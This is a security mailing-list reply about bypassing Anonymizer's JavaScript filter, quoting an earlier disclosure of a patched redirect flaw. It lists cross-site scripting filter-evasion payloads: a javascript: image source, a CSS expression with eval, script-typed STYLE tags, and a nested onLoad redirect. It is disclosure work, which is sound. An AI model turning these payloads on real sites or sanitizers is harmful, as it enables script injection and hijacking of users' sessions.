Re: Bypassing javascript filters - problem N3.

[fozzy () dmpfrance com]

Hello,

I took a quick look at it. This service seems to be vulnerable to several
known attacks against webmails.
I successfully injected unfiltered javascript into a web page browsed
through Anonymizer using:

* <img aaa="bbb>" src="javascript:alert('beep');">  
(the original idea was published by Mark Slemko on vuln-dev, 23 Feb 2000...
but is still ignored on many webmails !)

* <P STYLE="left:expression(eval('alert(\'boop\')'))">  (thx to Guninski -
Bugtraq 1999)

* Some things that seems to work only with Netscape 4.x, like :
<STYLE TYPE="text/javascript">alert('biip');</style>
<STYLE TYPE="application/x-javascript">alert('burp');</style>
<LINK REL=STYLESHEET TYPE="text/javascript" SRC="http://.../script.js";>
(thx to Jeremiah Grossman - WhiteHatSec Aug 2001)

...and probably more !...

I wish good luck to Anonymizer, because I what they are trying to do is
very close to "malicious html filtering" in webmails, and it seems to be
really difficult for webmails site to setup good filters. I wish Anonymizer
will show the way to a good web privacy.

FozZy

Hackademy - Paris.
Hackerz Voice International Edition
http://www.dmpfrance.com

Alexander K. Yezhov écrit:

> Hello bugtraq,
>
>   Title: Bypassing JavaScript filters
>   Service: Anonymizer, maybe similar services
>
>   Description:
>
>   Anonymizer  offers free and commercial services that allow to browse
>   web safely. Since JavaScript can be dangerous, all script blocks and
>   events are cut from html.
>
>   Problem N3:
>
>   Maybe  you  remember  the problem I've reported in 2001 - JavaScript
>   code  could  be  executed  after parsing the html by Anonymizer. The
>   same principle of "JavaScript inside JavaScript" gave me the working
>   example of redirecting Anonymizer users recently.
>
>   Demo is available as Test N3 at
>   http://anon.free.anonymizer.com/http://tools-on.net/you.shtml
>
>   The part of the code before parsing:
>
>   onLoad="onLoad="document.cookie='rw=; expires=Thu, 01-Jan-1970
>   onLoad="location='unprotected_location';"
>
>   The same code after parsing:
>
>   onLoad="location='unprotected_location';"
>   
>   Errors  generated  for visitors without Anonymizer are suppressed by
>   window.onError handler.
>
>   Problem status:
>   
>   Anonymizer has been contacted and patched already.
>
> Best regards, Alexander                          
>
> -----------------------------------------------------------------------
>          MCP+I, MCSE on Windows NT 4, MCSE on Windows 2000
>   http://leader.ru http://tools-on.net (Security & Privacy on the Net)
> -----------------------------------------------------------------------